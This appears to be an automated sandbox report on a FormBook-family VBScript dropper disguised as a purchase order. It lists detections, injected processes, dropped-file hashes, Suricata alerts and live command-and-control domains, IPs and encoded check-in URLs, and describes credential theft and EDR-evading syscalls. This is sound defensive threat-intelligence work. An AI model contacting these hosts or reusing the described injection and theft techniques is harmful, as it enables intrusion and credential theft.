                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566711 Sample: PO_1111101161.vbs Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 35 www.duwixushx.xyz 2->35 37 www.yvcp3.info 2->37 39 6 other IPs or domains 2->39 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected FormBook 2->53 57 4 other signatures 2->57 11 wscript.exe 3 2->11         started        signatures3 55 Performs DNS queries to domains with low reputation 35->55 process4 file5 33 C:\Users\user\AppData\...\p_Cm7afCdw.exe, PE32 11->33 dropped 71 Benign windows process drops PE files 11->71 73 VBScript performs obfuscated calls to suspicious functions 11->73 75 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->75 77 Suspicious execution chain found 11->77 15 p_Cm7afCdw.exe 3 11->15         started        signatures6 process7 signatures8 81 Antivirus detection for dropped file 15->81 83 Machine Learning detection for dropped file 15->83 85 Writes to foreign memory regions 15->85 87 2 other signatures 15->87 18 RegAsm.exe 15->18         started        process9 signatures10 47 Maps a DLL or memory area into another process 18->47 21 IGcdoWhymz.exe 18->21 injected process11 signatures12 59 Maps a DLL or memory area into another process 21->59 61 Found direct / indirect Syscall (likely to bypass EDR) 21->61 24 SearchProtocolHost.exe 13 21->24         started        process13 signatures14 63 Tries to steal Mail credentials (via file / registry access) 24->63 65 Tries to harvest and steal browser information (history, passwords, etc) 24->65 67 Modifies the context of a thread in another process (thread injection) 24->67 69 3 other signatures 24->69 27 IGcdoWhymz.exe 24->27 injected 31 firefox.exe 24->31         started        process15 dnsIp16 41 1hong.pels5zqo.shop 129.226.153.85, 49862, 49868, 49875 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 27->41 43 www.duwixushx.xyz 156.251.17.224, 49825, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 27->43 45 3 other IPs or domains 27->45 79 Found direct / indirect Syscall (likely to bypass EDR) 27->79 signatures17

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO_1111101161.vbs18%ReversingLabsScript-WScript.Trojan.AgentTesla

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.yvcp3.info/i7qk/?cNeT5P=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImU0UbKzMKFpXAJ3iP9s5hV6VkbgV3kS/JEHHqfdUXmoMZ21WIq3bcKVXK&l0W=Yh8P0%Avira URL Cloudsafe
                http://www.supernutra01.online/jt56/0%Avira URL Cloudsafe
                http://www.guacamask.online/rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOj0%Avira URL Cloudsafe
                http://www.guacamask.online/rfhq/0%Avira URL Cloudsafe
                http://www.yvcp3.info/i7qk/0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8P0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/od8t/0%Avira URL Cloudsafe
                http://www.supernutra01.online/jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.guacamask.online
                		208.91.197.27
                		truetrue
                  		unknown
                  1hong.pels5zqo.shop
                  		129.226.153.85
                  		truetrue
                    		unknown
                    www.yvcp3.info
                    		47.254.140.255
                    		truetrue
                      		unknown
                      www.supernutra01.online
                      		104.21.24.198
                      		truefalse
                        		high
                        www.duwixushx.xyz
                        		156.251.17.224
                        		truetrue
                          		unknown
                          s-part-0035.t-0009.t-msedge.net
                          		13.107.246.63
                          		truefalse
                            		high
                            www.1qcczjvh2.autos
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.guacamask.online/rfhq/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.supernutra01.online/jt56/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.duwixushx.xyz/bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOjtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.yvcp3.info/i7qk/?cNeT5P=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImU0UbKzMKFpXAJ3iP9s5hV6VkbgV3kS/JEHHqfdUXmoMZ21WIq3bcKVXK&l0W=Yh8Ptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.guacamask.online/rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8Ptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.1qcczjvh2.autos/od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8Ptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.yvcp3.info/i7qk/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.1qcczjvh2.autos/od8t/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.supernutra01.online/jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8Ptrue
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              156.251.17.224
                              		www.duwixushx.xyzSeychelles
                              		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                              208.91.197.27
                              		www.guacamask.onlineVirgin Islands (BRITISH)
                              		40034CONFLUENCE-NETWORK-INCVGtrue
                              47.254.140.255
                              		www.yvcp3.infoUnited States
                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                              129.226.153.85
                              		1hong.pels5zqo.shopSingapore
                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                              104.21.24.198
                              		www.supernutra01.onlineUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1566711
                              Start date and time:2024-12-02 15:52:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO_1111101161.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@9/4@5/5
                              EGA Information:
                              • Successful, ratio: 83.3%
                              HCA Information:
                              • Successful, ratio: 87%
                              • Number of executed functions: 79
                              • Number of non-executed functions: 244
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: PO_1111101161.vbs

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:54:35API Interceptor1416763x Sleep call for process: SearchProtocolHost.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              156.251.17.224OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                              • www.duwixushx.xyz/q0vk/
                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
                              208.91.197.27specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.cortisalincontrol.net/cbfz/
                              1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.joeltcarpenter.online/9pyp/
                              ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.cortisalincontrol.net/cbfz/
                              W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.matteicapital.online/hyyd/
                              FATURA.exeGet hashmaliciousFormBookBrowse
                              • www.martaschrimpf.info/qr9f/
                              Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.matteicapital.online/hyyd/
                              file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.regislemberthe.online/1y0g/
                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.614genetics.online/ftvk/
                              TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                              • www.martaschrimpf.info/qr9f/
                              PO #2411071822.exeGet hashmaliciousFormBookBrowse
                              • www.matteicapital.online/hyyd/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              www.yvcp3.infoDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • 47.254.140.255
                              www.guacamask.onlineDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • 208.91.197.27
                              1hong.pels5zqo.shopattached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 43.163.1.110
                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • 43.163.1.110
                              s-part-0035.t-0009.t-msedge.netNew Order.xlsGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 13.107.246.63
                              RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exeGet hashmaliciousRemcosBrowse
                              • 13.107.246.63
                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 13.107.246.63
                              https://a.rs6.net/1/pc?ep=e4f2f4ad2c30fbb2SK2ZyQxbsE02cV3UOfuPD-JxSRgUD6Y86mFtUF3WRqjeuMrz9o3Xbb320wCTDsWWUHuFG0qWroCiniptiREBdHyyzdrPc45m6t-HBEB7SZ8gZX4dYr4o80JwDUJz1eSGQlrcb9as_P_3jZu-t-DrRTdQARm9vPjp5IAqdyzm4bLxpaVnP8_0eRiLoUggvzge&c=$%7bContact.encryptedContactId%7dGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousUnknownBrowse
                              • 13.107.246.63
                              https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.63
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 13.107.246.63
                              www.duwixushx.xyzOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                              • 156.251.17.224
                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • 156.251.17.224
                              www.supernutra01.onlinePAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                              • 104.21.24.198
                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                              • 104.21.24.198
                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 104.21.24.198
                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                              • 172.67.220.36
                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                              • 172.67.220.36
                              Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                              • 172.67.220.36
                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                              • 172.67.220.36

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                              • 101.35.209.183
                              Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 101.35.209.183
                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                              • 162.62.116.233
                              m68k.elfGet hashmaliciousMirai, MoobotBrowse
                              • 101.32.73.21
                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                              • 162.62.73.78
                              https://zfrmz.com/mH78Gmbnl9SICcogz2hNGet hashmaliciousHTMLPhisherBrowse
                              • 170.106.97.198
                              mpsl.elfGet hashmaliciousMiraiBrowse
                              • 101.34.151.45
                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                              • 101.33.132.16
                              https://vectaire.doclawfederal.com/uDLtT/Get hashmaliciousHTMLPhisherBrowse
                              • 49.51.77.119
                              apep.m68k.elfGet hashmaliciousUnknownBrowse
                              • 101.34.126.81
                              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 47.74.205.199
                              sora.mips.elfGet hashmaliciousMiraiBrowse
                              • 47.56.146.36
                              sh4.elfGet hashmaliciousMirai, MoobotBrowse
                              • 8.215.228.204
                              spc.elfGet hashmaliciousMirai, MoobotBrowse
                              • 8.218.63.156
                              arm.elfGet hashmaliciousMiraiBrowse
                              • 47.91.26.146
                              file.ps1Get hashmaliciousLummaC StealerBrowse
                              • 149.129.12.34
                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                              • 47.240.238.141
                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                              • 47.52.22.235
                              https://sandisk2.oss-ap-northeast-2.aliyuncs.comGet hashmaliciousUnknownBrowse
                              • 149.129.12.34
                              nabx86.elfGet hashmaliciousUnknownBrowse
                              • 47.89.129.239
                              POWERLINE-AS-APPOWERLINEDATACENTERHKCCE 30411252024.exeGet hashmaliciousFormBookBrowse
                              • 154.215.72.110
                              sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 154.209.101.20
                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 156.230.73.250
                              mpsl.elfGet hashmaliciousMiraiBrowse
                              • 156.253.186.202
                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                              • 45.13.160.66
                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                              • 154.220.159.10
                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                              • 154.203.73.133
                              botx.sh4.elfGet hashmaliciousMiraiBrowse
                              • 154.218.51.85
                              arm7.elfGet hashmaliciousMiraiBrowse
                              • 156.251.7.143
                              x86.elfGet hashmaliciousMiraiBrowse
                              • 156.242.206.41
                              CONFLUENCE-NETWORK-INCVGProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                              • 208.91.197.39
                              https://url.uk.m.mimecastprotect.com/s/lJtaCvgKLI76mPoHQfgHQcCL-?domain=cognitoforms.comGet hashmaliciousHTMLPhisherBrowse
                              • 208.91.197.132
                              specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              FATURA.exeGet hashmaliciousFormBookBrowse
                              • 208.91.197.27
                              Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 208.91.197.27
                              ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 208.91.197.27

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\p_Cm7afCdw.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):226
                              Entropy (8bit):5.360398796477698
                              Encrypted:false
                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                              MD5:3A8957C6382192B71471BD14359D0B12
                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                              C:\Users\user\AppData\Local\Temp\74w51-39

                              Download File
                              Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                              Category:modified
                              Size (bytes):196608
                              Entropy (8bit):1.1215420383712111
                              Encrypted:false
                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\exec_VPfRCcR9.log

                              Download File
                              Process:C:\Windows\System32\wscript.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):180
                              Entropy (8bit):5.116525900210071
                              Encrypted:false
                              SSDEEP:3:aAf/4srWfQV7KLuvlFAfnnfy9JCB/WDerbJSRE2J5xAInOkANFAfnnf18SwAe:aAf/4safjcHAfnfy9JCUe0i23fnTAvA2
                              MD5:5074C482514538A496FC0262B774CAA5
                              SHA1:36D44D9988D16A010E783011D30C8011754563C4
                              SHA-256:562434FA20681B9D3ED1C3A32EAC097053FAEC8819C256F682E0ADD5898F1E6A
                              SHA-512:12BDD0367C2DCC8B5C20D13C1CCFD8E9DA6AD1308488987136688D874DF3F81CFD469A3FAE17B7F230E3A000FE8AE2A440497ABA666E67BFD1E2866E75054519
                              Malicious:false
                              Preview:02/12/2024 09:53:20 - INFO: Setup done...02/12/2024 09:53:43 - INFO: File cleaned: C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe..02/12/2024 09:53:43 - INFO: Teardown done...

                              C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe

                              Download File
                              Process:C:\Windows\System32\wscript.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):396288
                              Entropy (8bit):7.974699156321406
                              Encrypted:false
                              SSDEEP:12288:1nbeASreBVj5+TXScU4vqcbBU0VhVKMUbbqR:Jb7Sre1+D0MRbW0VjDKqR
                              MD5:5E4094C909CCCBA80D844F553391F9F2
                              SHA1:8C4A46703D6110F4B57EFB990DAA8A8A59C8E469
                              SHA-256:52F879013B5C8431C347AF65A8365F040D83302D5FD9F805CD4D97CC26FCBF98
                              SHA-512:ECCA6CF7559233302A0DC11D315E8C401628D527610AFE052AE3B1B1F25D4985CDAF70CB961CFF9EB6FE5ECAF37D745CE4A19A8709C1E02EE5AAF50916E2BE68
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....kMg..............0.............. ... ...@....@.. ....................................`.................................x ..W....`.......................@......8................................................ ............... ..H............text........ ...................... ..`.reloc.......@......................@..B.rsrc........`......................@..@................. ......H............5...........6.. ...........................................".(.....*....0...........(......*....0..W........~....~(.......,<.E.........-......&..(8...%&(@...%&(....%&o....s............~.....+..*..0...........~.....+..*..0.................*.0...........(....*..0...........(.....*.0..........s....(....(K...%&.....*..0...........~.....+..*..0..O.......( ...%&.......s!...o"...( ...%&.......s!...o#...($...%&..(....%&..(%...%&.....*..0...........(....*..0..........*...

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (64582), with CRLF line terminators
                              Entropy (8bit):5.900140446544773
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:PO_1111101161.vbs
                              File size:624'939 bytes
                              MD5:9311a38007910531ee085752d8f4bb94
                              SHA1:cd22e03275c2688f1600be4c520caaf87d76a4ec
                              SHA256:d4601158ebeec0fe8fd9799a60742222dc74d3eda2b7203f705d8195596bb12b
                              SHA512:dd9a1f2b17a3330ae9155978d13b1466eafb164c3bd496afef7a3c70c5c30969208665c44db3065cd8814cc60adbe74c2878c27e1426a7f0497e79b6fe0d3563
                              SSDEEP:12288:WwzU3E1suuH4LsjF347uzxSynGY+gzIrUEIF3s8uw:WyUBuhKFqqxxnGvgUKuw
                              TLSH:5BD4E0C2FF967B8C3C51C6F5141FAA449DCDACEB4234E6EDD42E364539808910A9F93A
                              File Content Preview:Option Explicit....Const TEMP_FOLDER = 2..Const MIN_SLEEP = 3000..Const MAX_SLEEP = 7000..Const DELETE_SLEEP = 2000..Const EXEC_SLEEP = 5000..Dim logFilePath....Sub Main().. Dim payload, preparedPayload.. Initialize.. payload = GetPayload()..

                              File Icon

                              Icon Hash:68d69b8f86ab9a86

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-02T15:54:15.558508+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749825156.251.17.22480TCP
                              2024-12-02T15:54:15.558508+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749825156.251.17.22480TCP
                              2024-12-02T15:54:32.780909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749862129.226.153.8580TCP
                              2024-12-02T15:54:35.448250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749868129.226.153.8580TCP
                              2024-12-02T15:54:38.104466+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749875129.226.153.8580TCP
                              2024-12-02T15:54:40.854477+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749883129.226.153.8580TCP
                              2024-12-02T15:54:40.854477+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749883129.226.153.8580TCP
                              2024-12-02T15:54:48.458834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74990147.254.140.25580TCP
                              2024-12-02T15:54:51.148441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74990747.254.140.25580TCP
                              2024-12-02T15:54:53.921492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74991447.254.140.25580TCP
                              2024-12-02T15:54:56.495424+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74992247.254.140.25580TCP
                              2024-12-02T15:54:56.495424+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74992247.254.140.25580TCP
                              2024-12-02T15:55:03.753321+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749937208.91.197.2780TCP
                              2024-12-02T15:55:06.426773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749945208.91.197.2780TCP
                              2024-12-02T15:55:09.123055+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749951208.91.197.2780TCP
                              2024-12-02T15:55:12.428428+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749957208.91.197.2780TCP
                              2024-12-02T15:55:12.428428+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749957208.91.197.2780TCP
                              2024-12-02T15:55:19.954873+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749977104.21.24.19880TCP
                              2024-12-02T15:55:22.669325+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749983104.21.24.19880TCP
                              2024-12-02T15:55:25.315029+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988104.21.24.19880TCP
                              2024-12-02T15:55:27.961594+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749989104.21.24.19880TCP
                              2024-12-02T15:55:27.961594+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749989104.21.24.19880TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 2, 2024 15:54:13.795255899 CET4982580192.168.2.7156.251.17.224
                              Dec 2, 2024 15:54:13.915288925 CET8049825156.251.17.224192.168.2.7
                              Dec 2, 2024 15:54:13.915365934 CET4982580192.168.2.7156.251.17.224
                              Dec 2, 2024 15:54:13.926316023 CET4982580192.168.2.7156.251.17.224
                              Dec 2, 2024 15:54:14.046226025 CET8049825156.251.17.224192.168.2.7
                              Dec 2, 2024 15:54:15.558311939 CET8049825156.251.17.224192.168.2.7
                              Dec 2, 2024 15:54:15.558458090 CET8049825156.251.17.224192.168.2.7
                              Dec 2, 2024 15:54:15.558507919 CET4982580192.168.2.7156.251.17.224
                              Dec 2, 2024 15:54:15.561815023 CET4982580192.168.2.7156.251.17.224
                              Dec 2, 2024 15:54:15.681797981 CET8049825156.251.17.224192.168.2.7
                              Dec 2, 2024 15:54:31.138391018 CET4986280192.168.2.7129.226.153.85
